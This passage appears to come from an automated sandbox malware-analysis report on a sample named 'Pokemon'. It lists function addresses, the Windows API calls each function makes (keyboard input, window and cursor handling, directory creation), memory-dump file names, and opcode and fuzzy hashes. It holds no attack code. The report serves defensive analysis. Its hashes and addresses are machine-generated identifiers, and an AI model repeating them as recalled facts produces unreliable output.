                                                                                                                                                                                                                                                                                      Function 000FB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 000FB5B8
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 000FB5D4
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 000FB63B
                                                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 000FB68D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cfb5435f2e4febad7005fa4c8a51db3633236b1902f7b1ffa48f43c426d6223a
                                                                                                                                                                                                                                                                                      • Instruction ID: 423d45a7d17b262e3c1f1b930c1741d70f2c94a4c0ba2d731f460df543a1d296
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfb5435f2e4febad7005fa4c8a51db3633236b1902f7b1ffa48f43c426d6223a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB31E970A4064CAEFF30CB65C8057FE7BE6AF85310F04422AE685D69D1C77C8A96AF51
                                                                                                                                                                                                                                                                                      Function 001280AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 001280D4
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0012814A
                                                                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,?), ref: 0012815A
                                                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 001281C6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d5eb3a9a0f281a387857f0cfa457a431d643e7cd70a51a4c40708b4b1a842ec0
                                                                                                                                                                                                                                                                                      • Instruction ID: 1f1cdd7f1bb8b72190ad5e5722b760e673b569364998e3539551b111867ceed6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5eb3a9a0f281a387857f0cfa457a431d643e7cd70a51a4c40708b4b1a842ec0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2418F30A02625DFDB15CF58E884AA9B7F5FF85314F1441A8E9549B2A1CB71E8A2CF50
                                                                                                                                                                                                                                                                                      Function 00122176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00122187
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F43AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetCurrentThreadId.KERNEL32 ref: 000F43B4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F2F00), ref: 000F43BB
                                                                                                                                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 0012219B
                                                                                                                                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 001221E8
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 001221EE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8735a38551813511f257e11ca6433eb783b86486e8af110ed04120d7d4ca3e3b
                                                                                                                                                                                                                                                                                      • Instruction ID: 73f68ff586e6b2b1a7eb3ca1cef5bbeaa2db86c7e40072adc67ed1e61a5a3181
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8735a38551813511f257e11ca6433eb783b86486e8af110ed04120d7d4ca3e3b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D316471D00109AFDB04EFA5C881CEEB7FCEF48304B54846AE515E7212DB719E45DBA0
                                                                                                                                                                                                                                                                                      Function 000FE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE8E2
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE8F9
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE924
                                                                                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 000FE92F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                      • Opcode ID: def9220ce4aca25191972efd34a9d324176e601f2e765cd1030f0bfee08e3aff
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d21e15a102d7867048e20493b051567c6615fabcfef9762695967e3a0b105d1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: def9220ce4aca25191972efd34a9d324176e601f2e765cd1030f0bfee08e3aff
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D21E571D00218AFCB51AFA8D981BFEBBF8EF55750F144065E904BB252D7709E41C7A1
                                                                                                                                                                                                                                                                                      Function 00129A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00129A5D
                                                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00129A72
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00129ABA
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00129AF0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 51cc5d2d7f410ee3660af527b7d2356a9ce49f1901b28d0a767b5a2b9a2a7fc9
                                                                                                                                                                                                                                                                                      • Instruction ID: c80db5bc4fc0f7afcbe65312bd43df2b116e6f93306d10812b27bb3296c3c549
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51cc5d2d7f410ee3660af527b7d2356a9ce49f1901b28d0a767b5a2b9a2a7fc9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B721BC34600228BFCF298F98EC48EFE7BB9EB49310F404165F9059B1A1D77599A1EB60
                                                                                                                                                                                                                                                                                      Function 000FDB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,0012DC30), ref: 000FDBA6
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000FDBB5
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 000FDBC4
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0012DC30), ref: 000FDC21
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 806f93a063bb7e5317b23c16bcb68e0acac0d6fa0c7ac54238b4fe6dafcc6ed3
                                                                                                                                                                                                                                                                                      • Instruction ID: 481c18221966a9f4da87dad7704d68608ddc6ab971f12155450cfb421c3c97b4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 806f93a063bb7e5317b23c16bcb68e0acac0d6fa0c7ac54238b4fe6dafcc6ed3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A21E53050930A9F8710DF24D9808AFB7E9EF56364F104A1EF599C36A2DB30D946EB82
                                                                                                                                                                                                                                                                                      Function 0012321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 001232A6
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001232C0
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001232CE
                                                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001232DC
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 457b41c8962201024e075577dbc1b7e6154efec22431779eed4e59305132c4f4
                                                                                                                                                                                                                                                                                      • Instruction ID: ffe1e51096f671d783be13d1e8034ed03399ecafa1c23d085b7a00ba582b28a0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 457b41c8962201024e075577dbc1b7e6154efec22431779eed4e59305132c4f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D421D631604121BFD7149F24E845FAA7BA5EF85314F248258F8368B6D2C779ED92C7D0
                                                                                                                                                                                                                                                                                      Function 000F825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,000F8271,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?), ref: 000F96F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F96E4: lstrcpyW.KERNEL32(00000000,?,?,000F8271,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F9719
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F96E4: lstrcmpiW.KERNEL32(00000000,?,000F8271,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?), ref: 000F974A
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F828A
                                                                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F82B0
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F82EB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                      • Opcode ID: a7e9fc5a7806e602e0e8593e7556d90199afd99777bbd9fd4fd08327aeef9c2a
                                                                                                                                                                                                                                                                                      • Instruction ID: 5e0f471f12db2170a0b006e430add858bf60489e2f80aedf95ffec823655a45f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e9fc5a7806e602e0e8593e7556d90199afd99777bbd9fd4fd08327aeef9c2a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49110B7A200346BBCB149F38D845EFA77E9FF45750B50802AFA42C76A0EF319951D750
                                                                                                                                                                                                                                                                                      Function 001260FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 0012615A
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012616C
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00126177
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001262B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a7325b6ae37de43f9ba810f7f13f5a5a243329f0545df963bd99e53809015a21
                                                                                                                                                                                                                                                                                      • Instruction ID: bbd32ebf4cc50dcca5f636c04cf301a8fe684bd6de1229219174ea7c2a845f62
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7325b6ae37de43f9ba810f7f13f5a5a243329f0545df963bd99e53809015a21
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E119375900228AADB20DF64ADC4EEF7BBCFF51754B10412AFA15D60C2E774D961CB60
                                                                                                                                                                                                                                                                                      Function 000C2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 69e2b068f38c266d3703d15270e56b444224fec003ff9f5ffcf12ee62f0d9496
                                                                                                                                                                                                                                                                                      • Instruction ID: 61450220638bec58add8ca72ad52c9812528cba56a7ce10ce6942613e490c004
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e2b068f38c266d3703d15270e56b444224fec003ff9f5ffcf12ee62f0d9496
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A901A2B22052167EF67127B8BCC0F6F679DDF513B8B35072EB521A19D3DA608C90D160
                                                                                                                                                                                                                                                                                      Function 000F2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000F2394
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F23A6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F23BC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F23D7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 68a93c792b17b56504e0feb88fe5b3fdbc0434b42a86e1278ee0fd6704570a42
                                                                                                                                                                                                                                                                                      • Instruction ID: 054372345f6c43484c005b9ecbc541aa54a0e4726c4c840acbe8977de6d054a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a93c792b17b56504e0feb88fe5b3fdbc0434b42a86e1278ee0fd6704570a42
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68110C76900218FFDB119B95CD85FADBBB8FB08750F210091E601B7290D6716F55EB94
                                                                                                                                                                                                                                                                                      Function 00091AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00091AF4
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 000D31F9
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 000D3203
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000D320E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
